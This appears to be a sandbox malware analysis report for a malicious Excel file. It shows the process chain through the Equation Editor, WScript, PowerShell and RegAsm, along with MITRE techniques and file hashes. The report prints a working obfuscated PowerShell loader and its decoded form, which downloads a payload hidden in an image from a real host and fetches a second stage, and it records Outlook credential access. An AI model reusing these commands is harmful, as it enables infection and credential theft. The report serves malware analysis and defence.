Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

pid process

936 powershell.exe
1716 powershell.exe
1788 powershell.exe
2108 RegAsm.exe
2108 RegAsm.exe
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

RegAsm.exe

pid process

2788 RegAsm.exe
2788 RegAsm.exe
2788 RegAsm.exe

pid	process
936	powershell.exe
1716	powershell.exe
1788	powershell.exe
2108	RegAsm.exe
2108	RegAsm.exe

pid	process
2788	RegAsm.exe
2788	RegAsm.exe
2788	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeWINWORD.EXERegAsm.exe

description	pid	process
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeShutdownPrivilege	2060	WINWORD.EXE
Token: SeDebugPrivilege	1848	RegAsm.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid	process
2872	EXCEL.EXE
2872	EXCEL.EXE
2872	EXCEL.EXE
2872	EXCEL.EXE
2872	EXCEL.EXE
2060	WINWORD.EXE
2060	WINWORD.EXE
2872	EXCEL.EXE
2872	EXCEL.EXE
2872	EXCEL.EXE
2872	EXCEL.EXE

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 1516 wrote to memory of 2068	1516	EQNEDT32.EXE	WScript.exe
PID 1516 wrote to memory of 2068	1516	EQNEDT32.EXE	WScript.exe
PID 1516 wrote to memory of 2068	1516	EQNEDT32.EXE	WScript.exe
PID 1516 wrote to memory of 2068	1516	EQNEDT32.EXE	WScript.exe
PID 2060 wrote to memory of 2132	2060	WINWORD.EXE	splwow64.exe
PID 2060 wrote to memory of 2132	2060	WINWORD.EXE	splwow64.exe
PID 2060 wrote to memory of 2132	2060	WINWORD.EXE	splwow64.exe
PID 2060 wrote to memory of 2132	2060	WINWORD.EXE	splwow64.exe
PID 2068 wrote to memory of 936	2068	WScript.exe	powershell.exe
PID 2068 wrote to memory of 936	2068	WScript.exe	powershell.exe
PID 2068 wrote to memory of 936	2068	WScript.exe	powershell.exe
PID 2068 wrote to memory of 936	2068	WScript.exe	powershell.exe
PID 936 wrote to memory of 1716	936	powershell.exe	powershell.exe
PID 936 wrote to memory of 1716	936	powershell.exe	powershell.exe
PID 936 wrote to memory of 1716	936	powershell.exe	powershell.exe
PID 936 wrote to memory of 1716	936	powershell.exe	powershell.exe
PID 1716 wrote to memory of 1788	1716	powershell.exe	powershell.exe
PID 1716 wrote to memory of 1788	1716	powershell.exe	powershell.exe
PID 1716 wrote to memory of 1788	1716	powershell.exe	powershell.exe
PID 1716 wrote to memory of 1788	1716	powershell.exe	powershell.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 1716 wrote to memory of 2788	1716	powershell.exe	RegAsm.exe
PID 2788 wrote to memory of 2108	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 2108	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 2108	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 2108	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 2108	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 2108	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 2108	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 2108	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1008	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1008	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1008	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1008	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1008	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1008	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1008	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1008	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1848	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1848	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1848	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1848	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1848	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1848	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1848	2788	RegAsm.exe	RegAsm.exe
PID 2788 wrote to memory of 1848	2788	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ec5062b6c5c6648b188b29b28741d4911a36986ec5adccad8ecffa5e8b41734b.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2872

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2060

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2132

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\lovethemagicof.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreNQDgTrevDgTreDkDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwByDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrewDgTreDQDgTreMQDgTrezDgTreDkDgTreOQDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre1DgTreDUDgTreLwDgTre5DgTreDkDgTreNwDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTrecgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMDgTreDgTre0DgTreDEDgTreMwDgTre5DgTreDkDgTreMwDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBIDgTreEEDgTreQQBNDgTreC8DgTreMDgTreDgTreyDgTreDEDgTreMwDgTrevDgTreDIDgTreODgTreDgTreuDgTreDkDgTreMQDgTreyDgTreC4DgTreMgDgTrezDgTreC4DgTreNwDgTrewDgTreDIDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE0DgTreQQBBDgTreEgDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993', 'https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HAAM/0213/28.912.23.702//:ptth' , '1' , 'C:\ProgramData\' , 'MAAH','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\MAAH.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\miazdqjfytmujpk"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2108

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\wdfsejuzmbezlvyxgqr"
6⤵
- Accesses Microsoft Outlook accounts
PID:1008

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zxlkebfbajwmwbujpbelra"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6a0838b4e105c05aee53bebf2132008e

SHA1
5f1fe3ae9afd9f43fed956ec62d8a28fa9e41ef4

SHA256
a6aa39b9785b1ddbb65d6d68a3e042c75f4122521a6a14b60a0b2e5360a9ba32

SHA512
1182a6b193ef28eef45d3780175fdb7eda892f2e7fe42648b46d6a40ba5dea473c85532c5eafb49aaaa789b6d2eece63578b870bd531f9ced43b3fe06aaf952a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{070E97CA-7911-4971-B47A-7D915FDE2FF0}.FSD

Filesize
128KB

MD5
c96e68410903364251b6e07ce3f18cf5

SHA1
9526578d88872f2dc5c589bdf55a23630c4a57f6

SHA256
65d7f9e08ecffbeb1ec71e037789971c4890f60f75b6c3ac5907832c24ac8fb1

SHA512
0ba12082a5196db97f3a16160facfe95b2c28bf287ddf3264b7a0bdf74ae1f2b91d9b4834903fb2955f8333f0ca014c86d689b1c48c8321172646c15379d2dd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
4ced142de41d76c3f84f332882f11dab

SHA1
4fce1089a6686803d274c786e0ec3f7e0bec98b2

SHA256
c8436971a674dc4a72648337e171fbc1ff35ae58d99e95a7d2b7c297c6117dfa

SHA512
7d714e465a83ed29591328fb92cc2baea70d788e260d9e4bc38e4a23a45d8744605fc6554b106c44d605f2e042b00610368866b6b03f22edf0f589a624a852c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{C40C672E-4241-40C8-BC7B-261F42DE4854}.FSD

Filesize
128KB

MD5
4515cbac03116fe6eaa514866e2c3148

SHA1
6db4227f0a41bb3340ae4f763a058260783f0fe5

SHA256
09308553b2fef2af7468cd395c63c8d08ed391dda91edfb77b3499ff52509abc

SHA512
46a022dca7464a1a296651d28971091895979d752d6c2e56c850f2ea472f8caeedfb022a8b7022634ce7e979fa6c74b197a73810df4e3c6669e67462d50098a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NXAFS242\whenufeeliloveyousoomuchthattimeuunderstandhowmuchiamlovingyouualwaysmygirlinever____wanttokissyoualotwithyouilove[1].doc

Filesize
64KB

MD5
e5b3a6d472135ed9abc2465da76c563d

SHA1
7f41dc17320ea8844fa61bf5f67d186ae90c7a43

SHA256
ec5b19fd0f2525fcaaaf27afbf6719b4b824ee208625677641cf2a290d546b8d

SHA512
ddaa8bc65cd8ae38d6ad976b2eec0d1199907801e94f4796f4c90c8096bfdfcb0ac943ae728e67c22785ce28974987bf7bc1db4e338559124e5387a11115c914

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7DA8.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7DCA.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
